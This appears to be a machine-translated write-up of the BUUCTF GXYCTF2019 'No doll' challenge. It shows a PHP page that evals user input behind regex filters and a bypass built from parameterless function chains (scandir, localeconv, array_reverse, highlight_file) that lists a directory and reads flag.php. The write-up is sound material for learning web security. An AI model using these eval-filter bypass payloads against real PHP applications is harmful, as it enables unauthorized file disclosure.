当前位置:网站首页>Buuctf-[gxyctf2019] no dolls (xiaoyute detailed explanation)
Buuctf-[gxyctf2019] no dolls (xiaoyute detailed explanation)
2022-07-06 06:00:00 【Xiaoyute detailed explanation】
buuctf-[GXYCTF2019] No doll ( Xiaoyute detailed explanation )
Let's look at the question first
There is no useful information found here , First use dirsearch To blow up but didn't find anything useful , At this time, I suspect there is git Leaked the use here githack Detection found index.php
Look at the source code here
<?php
2 include "flag.php";
3 echo "flag Where is it ?<br>";
4 if(isset($_GET['exp'])){
// Need to be GET The form passes in a name exp Parameters of . If the conditions are met, this... Will be executed exp Parameter content .
5 if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
// Several common pseudo protocols are filtered , Cannot read file with pseudo Protocol .
6 if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
//(?R) Reference the current expression , I added ? Recursively call . You can only match through parameterless functions .
7 if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// Regular matches are missing et/na/info Other key words , Many functions don't work .
8 // echo $_GET['exp'];
9 @eval($_GET['exp']);
10 }
11 else{
12 die(" It's a little bit close to !");
13 }
14 }
15 else{
16 die(" Think about it !");
17 }
18 }
19 else{
20 die(" Still want to read flag, Smelly brother !");
21 }
22 }
23 // highlight_file(__FILE__);
24 ?>
The key point is
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
there ?R It means
Reference the current expression , Add... To the back ? It's a recursive call
therefore exp Must be a(b()); This type is OK
We learned from the source code flag stay flag.php in
Just find a way to read
scandir() Function can scan files in the current directory
<?php
print_r(scandir('.'));
?>
structure scandir(’.’) Can
It's used here 2 A function
localeconv() Function returns an array of local numbers and currency format information . And the first item in the array is .
current() Returns the current cell in the array , The first value is taken by default .
Note here
current(localeconv()) Always a point
First step
?exp=print_r(scandir(current(localeconv())));
Here you need to read the penultimate array
Two functions are also used here
next(): The function points the internal pointer to the next element in the array , And the output
array_reverse(): Array returns the array in the reverse order of elements
final payload
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
边栏推荐
- 养了只小猫咪
- Gtest之TEST宏的用法
- How to recover Huawei router's forgotten password
- LAN communication process in the same network segment
- Yygh-11-timing statistics
- H3C S5820V2_ Upgrade method after stacking IRF2 of 5830v2 switch
- Database: ODBC remote access SQL Server2008 in oracel
- Analysis of grammar elements in turtle Library
- 多线程应用的测试与调试
- Garbage collector with serial, throughput priority and response time priority
猜你喜欢
Station B Liu Erden - linear regression and gradient descent
Winter 2021 pat class B problem solution (C language)
Mysql database master-slave cluster construction
H3C firewall rbm+vrrp networking configuration
清除浮动的方式
The digital economy has broken through the waves. Is Ltd a Web3.0 website with independent rights and interests?
About PHP startup, mongodb cannot find the specified module
YYGH-11-定时统计
类和对象(一)this指针详解
华为BFD的配置规范
随机推荐
Winter 2021 pat class B problem solution (C language)
Construction of yolox based on paste framework
Company video accelerated playback
OSPF configuration command of Huawei equipment
公司视频加速播放
Hongliao Technology: how to quickly improve Tiktok store
Novice entry SCM must understand those things
Rustdesk builds its own remote desktop relay server
Embedded point test of app
(5) Explanation of yolo-v3 core source code (3)
H3C V7版本交换机配置IRF
How to use the container reflection method encapsulated by thinkphp5.1 in business code
Embedded interview questions (IV. common algorithms)
Gtest之TEST宏的用法
养了只小猫咪
Eigen稀疏矩阵操作
网络协议模型
[course notes] Compilation Principle
H3C S5820V2_ Upgrade method after stacking IRF2 of 5830v2 switch
[email protected] raspberry pie